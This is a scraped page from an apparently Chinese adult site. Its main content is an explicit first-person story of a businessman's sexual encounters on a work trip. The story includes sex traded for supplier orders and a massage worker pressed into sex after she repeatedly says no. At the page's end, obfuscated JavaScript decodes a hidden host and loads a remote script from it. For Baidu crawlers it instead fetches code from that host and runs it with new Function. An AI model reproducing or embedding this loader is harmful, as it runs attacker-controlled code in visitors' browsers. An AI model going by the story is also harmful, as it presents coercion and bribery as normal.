返回

意外的白食3c2

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com



意外的白食之一
(原创者半根烟蒂)

看了很多兄弟们的力作,在小弟忍不住和老婆进行一次饭后运动之后,小弟我将这28年来的几次意外白食大餐给各位狼友介绍一下。文笔不足之处请多谅解!
言归正传,话说那是08年的10月,天开始冷了,小弟我去距离SH两小时车程
的城市JY出差,那天早上驾车带着公司一采购一起到供应商工厂去处理一票出口货物的质量问题,一路上两人担心货物质量有问题很难交付国外客户,所聊也都是工作上的事情。大约中午11点左右到达供应商工厂,他们老板L早早已经带了几名主要领导在大门口迎接了。

一番客套,一行人进到办公室坐定,L老板的小秘很识趣的扭着鼓鼓的大屁股泡上我最爱的极品铁观音,一边喝着茶一边接过L递过来的大熊猫,我公司的采购很识趣的帮我点上(这小伙子不错,有悟性,呵呵,要提拔),正要开始谈正事,L的小秘坐到我旁边说:“Q总,现在快12点了,要不先去吃午饭吧,你
饿坏了我们可担待不起啊,咯咯!”

(L的小秘叫小美,人长的也确实美,清秀的脸庞标志的五官,而且身材很到位,170的身高,两个大木瓜把衣服撑的上面三粒扣子根本扣不上,最重要的是那根舌头,喔~~想到就差点要射出来,L找她做小秘估计也就是看上这一点吧。
呵呵!)我下意识的吸了吸口水坏笑的说道:“好吧,小美,大家一起去吃饭,把你饿坏了L老板可要和我拼命了,哈哈”。

到底是久经沙场的女人啊,笑的两只大木瓜在胸前乱颤说:“别开我玩笑了,让老板娘听到就要开除我了,咯咯,到时候我没吃的可要你。”……这样勾引我啊,难道最近L老板没喂好她?毕竟大家都有过一腿了呵呵,我也不示弱的说:“哈,行啊,一定让你吃的饱饱的。”在座的都是过来人,都会意的笑了。
一阵哄笑之后一起上车到了他们订好位的酒店。相互落座,一顿胡侃加互相敬酒,喝到下午3点,我已经差不多8分醉了,L老板看我不行了就叫小美陪我
到房间休息,他们带着我的采购小张回工厂处理事情。

小美搀扶着我晃晃悠悠的来到房间打开门,把我放在床上,给我泡了杯茶弄了条冰毛巾给我敷在额头上,看了看我微闭着眼睛在休息,就自己把衣服裤子都脱了,进了洗手间,这小妮子今天穿的职业装,上身白色夹杂深色条文衬衫,一对爆乳把衬衫上面3粒扣子撑开露出那条诱人的鸿沟,下身是一条灰色的直筒长裤,翘翘的PP肉鼓鼓的顶着。

170的身高配上这身OL职业装,真是美妙啊,从吃饭开始我就忍不住偷偷摸
着她的性感小PP了,哈哈,要不是有这么多人,直接把她压在桌上办了。正在意乱情迷的时候,卫生间的水声没了,小美裹着浴巾走了出来,来到我面前,俯下身来问:“Q总,没事吧,有没有哪里不舒服啊?”,

我接着酒意说:“恩,就是有点头疼,你帮我揉揉”,小美听话的一双纤细的玉手放在了我的脑门上开始揉,这时候我的眼睛正对的就是那对白嫩的豪乳,经过刚才的搓洗,犹如出水的蜜桃,下面羊脂般嫩白的修长玉腿已经弯曲的跪在我双腿中间,看到这里我再也忍不住了,一把抱住腰,另只手一把扯掉浴巾,嘴直接叼住那颗水灵的葡萄,舌头不断的围绕旋转。

小美轻呼“喔~”的一声一把把我的头抱在她的胸前“你好坏,让我揉头,你又来勾引我。”我没空理会她,继续着我的工作,嘴换了另外一只乳头继续动作,一只手抱着腰,一只手已经覆盖在那湿漉漉的花瓣上,两只手指夹着肉肉的大阴唇,把中指伸在肉缝中间,肉肉裹着中指,中指滑着动口,美人头昂着从喉咙里发出舒服而又不满足的低吟。

就这样不停地弄了两分钟,小美从脸上到胸部都变成了桃红色,很是诱人,她实在被弄得受不了了“我不行了,我要,给我,喔~~~好痒。快~~”我也不再
折磨她,把手拿了出来,刚才因为用手指堵住的桃花洞顿时涌出了很多透明的液体,黏黏的,滑滑的滴在床单上,我用最快的速度脱掉衣服,而小美则用最快的速度脱掉了我的裤子,在我摆脱我的衬衣的时候,忽然感觉下身一热进入了一个潮湿而温暖所在。

她已经趴在我的胯下,我的小钢炮已经被她性感的小嘴吞没了,我索性闭上眼睛手抚摸着她光滑的背享受着。感觉JJ在被她的舌头缠绕,一阵躁动差点把持不住,赶忙拔出,一双迷离的眼神看着我,好像对我拔出有一些不舍,不甘。
我把她扑倒在床上,手不断揉搓着那对豪乳,JJ对着那潮水泛滥的洞口一插到底,“噢~~~~”一声长叹,小美眉头微皱,眼睛紧闭,说不出她是舒服的呻吟还是痛苦……

不去细想,埋头苦干,噼里啪啦,稀里哗啦,不停地抽查了20分钟仍然没有射意,可能酒精麻木了神经,没有那些美妙的快感只有惯性般的活塞运动,这时小美到高潮了,双手抓着我的手臂,闭着眼睛不停的摇着头,结实的屁股不断的松动,喉咙里发出:“喔~~~不行了,好舒服,好舒服啊,受不了了,啊~~~~~~”

一声歇斯底里的叫声之后小美处在半昏死状态。

这个女人就是这样,高潮来得那么激烈,那么澎湃。我也不去管她,就自顾自的奋力做着进出口业务,终于在大约冲刺了300下左右腰部一酸,“哦~~”这
时小美眼睛忽然一亮,抱紧了我:“啊~~~~~好烫。”就这样抱着抱了10分钟吧,
两人才缓过劲来。我看着小美的眼睛问:“这么久没见了,和你做还是这么爽,呵呵,你舒服嘛?”

小美甜甜的笑着说:“恩,舒服,我最喜欢你射在我里面,好烫,和别人不一样。”我笑笑说:“呵,你是说L老板和我不一样是把。”小美看着我,两人都付之一笑,大家都清楚只是逢场作戏而已,她照顾好我,我会给他老板源源不断的订单,而他老板赚了钱她就能得到报酬,说白了,她只是作为一个付费工具而已。

躺了一会,小美说:“我得回厂里看看,你过去吗?”我懒洋洋的回答:“不去了,小张在那处理就可以了,你带个话给老L,这批货不合格的地方必须要重做,不过我会给你们一个合适的价格,放心。”小美顿时满脸笑意的说:“真的啊,行,没问题,我们保证严格按照出货协议要求出货,您放心。”说完又亲了我一下。

我点了点头说:“那你去吧,我睡会,和你做的都脱力了。小张回来就让他到楼下浴场找我好了。”小美笑着点点头穿上衣服就出门了。

(呵呵,大家以为以上就是我要说的白食的话就错了,这只是前戏,只是一个引子。后面才是这天吃白食的开始)。

小美走了我就睡了,一直睡到下午4点多,一觉醒来感觉全身黏黏的,和小美做爱的汗和淫水都黏在身上。于是坐起身喝了杯水,穿上衣服关上门走向楼下的洗浴中心,准备痛快的洗一洗一身臭汗。来到洗浴大厅,两个龟公点头哈腰的走过来笑呵呵的说:“老板,洗浴吧,这边先换鞋,我帮您拿手牌,是要包厢么?”
我也不多话点点头,一会一个龟公给我换好鞋子,一个给我拿来了手牌,说:“好了,老板,您跟我来,3楼,小心滑。”点点头跟着他进了电梯,心想:这服务真是不错,几年来一直都是把顾客当爷看,不错。一路来到房间,进了房间,脱衣洗浴……这些就不再赘述了……洗完澡擦干上来到房间躺下,喝了口水,那个龟公敲门进来问:“老板,做点什么项目啊?最近我们这里大换血,以前的小姐都换掉了,要不试试?”

我心想:刚在房间做过了,就算了,而且妓女到底万人压,不干净啊。(小弟我做出口生意的,内地很多供应商那都有长期饭票,呵呵,还没招过鸡)于是说:“算了,不喜欢那些,喊个人来帮做做脚就好了。”

龟公马上回答:“好的,我给您找个活好人美的。稍等”说完就出去了,我晕,这话听得真别扭。

不一会进来一个大约30岁左右的少妇,身高大约160,穿着统一的制服,白
色棉体恤,黑色棉运动裤,乌黑的头发一直垂到臀部,进来问我:“老板,我能帮你服务么?”我点点头,于是关门,做下,“老板,做点什么项目?”,我说:“喊你当然做脚了,难道做爱啊,呵呵”(没想到真的把她给做了……)。
“哦”她笑着答应一声就从带来的小凳子中拿出一套工具,开始帮我做脚。我眯着眼睛休息,她就在不停做着,期间也没都少话,等到磨脚做好了她问我:“老板,要敲腿么?”我点点头,别说下午和小美那个小骚货做的腿还真酸了,正好捏捏。她的手法很熟练,在我腿上不轻不重的捏着,一直捏到我左边大腿的根部,由于我的JJ放在左边,她捏到根部的时候一手就把我JJ给压在我的腿上。
看她脸一红,身子微震了一下,假装没事的继续压着我的JJ捏着腿,而我休息了这么久也恢复了力气,给她这样一捏顿时JJ充血,很明显感觉在她手中膨胀延伸,她就这样捏了5分钟,换到右边开始捏右边的腿,这时候我已经完全坚挺了。把一次性浴裤挺起一个大大的帐篷,呵呵,很是壮观。由于包厢门上是有块透明玻璃的,她可能怕别人看到把,从旁边拉了条毛毯盖在了我在JJ上。
虽然还是撑着,但是已经不是那么明显了。她笑着看着我也没说话,我也看着她也不说话,就这样捏着,捏着,最后要结束的时候她用两只手按在我大腿根部的大动脉上,这时我还是坚挺着的,这样一压盖在我JJ上的毛毯一下勒住了我的JJ.

“啊,痛”我喊了一句,她忙松开说问:“怎么了?”我不好意思的说:“我下面被毛毯勒住了。”她一听,就笑嘻嘻的帮我把毛毯往下拉了拉,拉到了靠近JJ根部的地方说:“呵呵,谁让你不老实的。”……我晕,“是你压着它,它才反抗的好不好?”她听了抿着嘴笑,手又压上大动脉,这时意外发生了,我的JJ因为长时间坚挺已经分泌出了不少液体把一次性纸质浴裤弄湿了一块。
经过她这一压,两边固定住,JJ顿时别无选择的突破了那层纸给顶破了树立出来。“啊~怎么出来了,你这么厉害的啊”她脸红着说,都是过来人了,呵呵,看看就看看呗,我笑着说:“终于突破你的压迫了,它解放了。呵呵”她也笑了,笑的很好听,后来她帮我重新拿了条换上。

结束了她问:“你还要做什么?叫小姐么?我帮你叫个漂亮的,还是本地的呢”我笑笑说:“我不找妓女的,怕脏!”(呵呵,估计就是我这句话才让我最终能够白食到她。)她笑着说:“呵呵,是挺脏的,每天多少人上啊。那么我帮你找个漂亮的给你推油吧,看你不出来肯定难受的。”

我开玩笑的说:“呵呵,那你帮我推咯”,“我不做的,我只做脚的,呵呵”
依然笑着说,这句话让我铁定了只要她帮我做的决心,“那算了,你帮我做,我才去做,呵呵,别人不用了,摸过别人再来摸我啊。”,她低着头说:“那我先出去了。”说完关上门出去了,我以为没戏了……过了两分钟,有人敲门,我以为小张来了,说:“进来”,没想到是她,呵呵,她依然低着头:“我帮你做,走吧。”我一愣,呵呵,难道、……没多想,下床,穿鞋,两人一前一后去了推油房。

进去后,她拿出一瓶BB油笑着说:“我还没做过呢,今天拿你实习哦,呵呵,做的不好别怪我。”我笑着说:“放心,我会教你的。”二话不说就躺到铺好塑料纸的床上,她走过来帮我脱掉裤子,然后倒了BB油在手心揉了一会抹在我的胸部,两只手开始打圈圈,摸得我乳头痒痒的,顿时全身血液涌向下体,直接就是一柱擎天啊。

呵呵,她一直红着脸这样帮我全身都抹上了油,最后重点放在JJ部位,倒了油在我JJ上开始揉啊揉,真是舒服啊,我的手也不老实的抹上了她的胸部,隔着衣服一手抓去,别说正好一手掌握呢,就这样,她揉着我,我揉着她,我看到她脸上的红印慢慢延伸到了脖子,嘴里也发出了“恩~~恩~~”的呻吟,由于下午已经做过一次了,这次我知道会很久的也不用担心她会很快弄出来。

于是手伸进了她衣服里面,当手碰到她的胸罩的时候,她一只手忽然缩回来压着我的手用迷离的眼神看着我说:“不要伸进去,外面摸好了”我说:“这样我很难出来的,还是让我摸摸快一点。”她可能也想我快点不想这样折磨她的情欲吧,于是松开了手,我的手在解放的第一刻就绕到她背后解下了胸罩扣子,为此她还瞪了我一下,呵呵,不管你,这下手可爽了,捏揉搓,重点都在乳头上。
不一会她就已经乳头挺立,嘴里的“恩~~恩~~”声音也变大了很多,过了两分钟,她转过来说:“你怎么这么厉害啊,这么久还不出来,我手都酸了。”我顿时脑袋一个计划形成了,说:“我对手没什么感觉的,大飞机是很难出来的,这样吧,你坐我身上磨,会舒服很多”呵呵,我可没撒谎,是舒服很多不是很快出来。她茫然的问:“怎么坐啊?”

我引导她跨坐在我的JJ上用她的BB磨着我的JJ,虽然隔着裤子但是还是感觉
到她那里的柔软和温度,真是舒服啊,她磨了两下顿时感觉吃不消,叫声又大了一点“恩~~这样你能快点出来??恩~~~别骗我啊。恩~~~”,我坏坏的说:
“你看这样你也舒服吧,这样真的很舒服的。”这样磨了两三分钟吧,她眼神完全迷离了,我一只手抱着她的屁股帮助她前后蹭,另一只手捏着她的奶头。
我故意做起来一点嘴贴着她耳朵说:“好舒服哦,就是你的长裤刮着我有点痛,不然就出来了。”说着我两只手都绕到她的屁股后面把她的长裤往下拉,她尚存的一丝理智摇着头说:“不行,不行,就这样,不行。”可是我已经把她的长裤迅速的拉到小腿上,这时她只剩下一条内裤,还是这样的姿势,一个蹲着,一个躺着,她的BB还是隔着布在蹭着我的JJ,但是那张布已经很薄了,而且经过这段时间的摩擦,已经被她的淫水给湿透了。

我的JJ感觉就像在她BB上摩擦一样爽,她原先的坚持也没有了,只是一味的呻吟:“哦~~~恩~~~喔~~”,当然我不会这样就满足了,,呵呵,我手就在她
屁股后面内裤的边缘游走,大约磨了两分钟,我也在她耳边说:“舒服吧,把这个也脱掉吧,更舒服”说着我就一把拉下了那条已经湿透了的内裤,她还没来得及反应,我的JJ已经在她BB上肆意的游走,那种感觉真是爽啊,滑滑的,热热的,
感觉那里有张嘴在一张一合,一张一合。

她经过这样摩擦顿时也失去了反抗,已经闭上了眼睛仰着头喉咙里发出:“哦~~~~喔~~~~恩~~~~~”的呻吟声。磨了几分钟,她忽然说:“不行了,我忍
不住了,我要放进去,我要放进去”,她说着手抓住了我的JJ,一下坐到底,头又扬了起来一头齐臀的长发撒了下来刺在我的大腿上,痒痒的,“啊~~~怎么这么舒服,怎么会这么舒服的,天啊,真舒服啊”

她不断重复着,接着她全身开始颤抖,颤抖,JJ一下感觉被什么抓住了,在上面蠕动,松开,又抓住,我也感觉一阵燥热,我一下坐起来抱着她使劲的做着活塞运动,就在“啊~~~~~~”“额~~~~~~”

两声长吟中结束了这次战斗,她抱着我休息了10秒左右,下了地,蹲在地上让精液尽量的流出“你怎么射在我里面啊,我没结扎啊,怎么会这么舒服的啊”呵呵,最后那句估计是问她自己的吧。

我说:“呵呵,怀了就生下来让你老公养呗”她白了我一眼说:“你爽了,别人帮你养啊。坏蛋,对了,你说磨一磨得怎么进去了啊?”我装作无辜的说:“是你抓着它塞进去的啊,我很冤枉的”她扑哧一下笑了,悠悠的说“坏蛋,不过真的太舒服了,从来没这么舒服过。没想到我第一次给客人做推油就跟你做了,我这是怎么了,我只和老公做过。”我开解到:“呵呵,缘分吧,如果今天我们没在一起做你怎么会知道原来做爱这么爽啊,呵呵,要收你学费。”

她白了我一眼笑了。抱着我说:“你射的时候我像飞起来了,射出来的时候好烫好烫一下又把我砸到地上一下,好舒服”我笑笑没说话,呵呵,每个女人都这么说了。后来电话进来催钟,她穿好衣服拉着我回到房间,我问她:“你姓什么?哪里人啊?”她趴在我身上说:“我是安徽人,我姓宋,呵呵,叫送给你。”同时两人都哈哈大笑,这时候正想和她再亲热亲热。

小张来了,敲门进来笑笑说:“Q总,事情搞定了,他们还有10万个货下周二补齐,钱我先让会计打过来了。”我笑着点点头,“你也下去洗个澡吧,小张”,“好的”,小张站着没动,看着“送给我”,呵呵,小张还是个童子鸡有女人在还不好意思脱衣服,哈哈。

这时“送给我”很识趣的站起来说:“那我先出去了哦,以后来找我”我点点头笑笑在她的服务单上签上了非常满意。呵呵,在她的服务单上就写了磨脚敲腿推油三项,一共才100大洋,哈哈,,,这就是我那次在JY出差时遇上的白食
少妇“送给我”。

后来小张洗完澡,L老板打电话来说在楼上订好酒席,于是又是一顿胡塞海吃,最后小美想留我住下,我没有同意,今天已经做了两次了,还是身体要紧啊,呵呵,后来司机一路开回SH,到家已经两点了,老婆已经睡着,呵呵……
(这是几次白食中间的一个,这个女人我每次去JY出差都会去找她,她也从来不问我提什么条件,呵呵,互相娱乐。以上全部都是事实哦,对于供应商安排的小秘我从来不当白食,因为我会给他们肥厚的利润。)下一篇我就讲带客户去KTV吃了一次白食。

评分
相关推荐
3.0分

3.0分 意外的艳遇176

3.0分

3.0分 意外的狩猎264

3.0分

3.0分 意外的遇见31f

3.0分

3.0分 意外中的3P73f

3.0分

3.0分 意外的福利757

3.0分

3.0分 意外的豔遇f97

3.0分

3.0分 意外的偷情e50

3.0分

3.0分 意外3f1

3.0分

3.0分 意外3f1

3.0分

3.0分 意外的检查台1f5

3.0分

3.0分 三p中的意外1b9

3.0分

3.0分 意外的激情夜cbe

3.0分

3.0分 三p中的意外1b9

3.0分

3.0分 《第一次的意外》13f

3.0分

3.0分 老柯意外的春天c71

3.0分

3.0分 一次意外的发现39b


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};